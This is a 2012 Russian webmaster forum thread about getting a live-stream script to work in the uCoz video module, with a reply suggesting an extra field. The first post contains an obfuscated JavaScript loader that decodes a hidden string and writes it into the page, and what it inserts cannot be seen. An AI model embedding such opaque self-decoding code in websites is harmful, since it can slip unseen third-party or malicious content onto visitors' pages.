На форуме InfoScript.ru вы можете: задать вопросы по php, вопросы по javascript, вопросы по системе uCoz, заказать графику для вашего сайта и просто пообщаться с хорошими людьми
Страница 1 из 11
Модератор форума: frenkmalcov 
Форум вебмастера » Основной раздел » Вопросы по системе uCoz » Модуль "видео"
Модуль "видео"
salabaikin Дата: Понедельник, 17.09.2012, 15:58 | Сообщение # 1
Offline
Опытный
Пользователи
Сообщений:117
Награды:0
Замечания:0%
Репутация
0
Я хочу проводить у себя на сайте онлайн трансляции. И именно в разделе видео (да я знаю можно тупо взять скрипт и добавить на страницу пустую и там проводить) я вставляю (в добавлении видео в раздел "добавит код")скрипт:
Code
<script language="JavaScript1.2">
<!--
a="1F1Q1]1`1c1d2Y2Z1a3M3Y1^3Z3^1Z3]1T1W3a1U2P2[1R3P3Q1M1N3O3S1K3_1I3W1G3c3d0g"
+"1?1B3K1@3X3b1;1<2J301316172i3L142c2g1+1.1/2`2f1,2M2W0j3`0h2j3U0]0`0c3V0a2X"
+"2e0^3N3R0Z2L2h";
l=new Array();
while(a.length){l.push((Y(a.charCodeAt(0))<<6)+Y(a.charCodeAt(1))-512);
a=a.slice(2,a.length)}
d="WTF>8<J],jWVZVZ*3^QNB/*a:VP6*/L1_2*@2I:UY,K32DD]16eiLgZBaJPhLY2D0[3-N5]CZV"
+"Z*64BP;J>-C,]BZ,+,7PK.0BXN5]CZM;]c=fhCU7?P9>DJCRE.M+E@;jRh*=14b>0^i.jU2CD:"
+"VZ;9>XT`U@WD<-NO^`3:d9d^e`413`+K.1M,]9jS+h:cRFON6W2AgEeMR2hCE;=hWj*LHeMR2h"
+"C=A=EjJ;9G=D4IWYecW*LHeN`_aje_,,3fU/V+=LK]@*";
c=324;e=b=a=0;o="";
function Y(y){if(y>92)y--;return y-42}
function B(){if(a==0){b=Y(d.charCodeAt(e++));a=6;}
return ((b>>--a)&0x01);}
while(c--){i=0;while(l[i]<0){if(B())i=-l[i];else i++;}
o+=String.fromCharCode(l[i]);}document.write(o);
// --></script>


и у меня выдает ошибку. Как добавить этот скрипт ? И вместо обычного видео была эта трансляция. Может есть какие то хаки добавляющие другие скрипты вместо ссылки на видео ?


http://vk.com/arsenal_club
 
vov2790 Дата: Пятница, 21.09.2012, 00:11 | Сообщение # 2
Offline
Опытный
Пользователи
Сообщений:108
Награды:0
Замечания:0%
Репутация
10
скрипты же вроде не будут через форму добавления работать

Добавлено (21.09.2012, 00:11)
---------------------------------------------
по идее можно включить дополнительно поле , и с помощью него выводить код там где это нужно.


PHP+MySQL Хостинг с неограниченным трафиком и тестовым периодом от 30 рублей в месяц >> goo.gl/mF3Hsn
 
Форум вебмастера » Основной раздел » Вопросы по системе uCoz » Модуль "видео"
Страница 1 из 11
Поиск: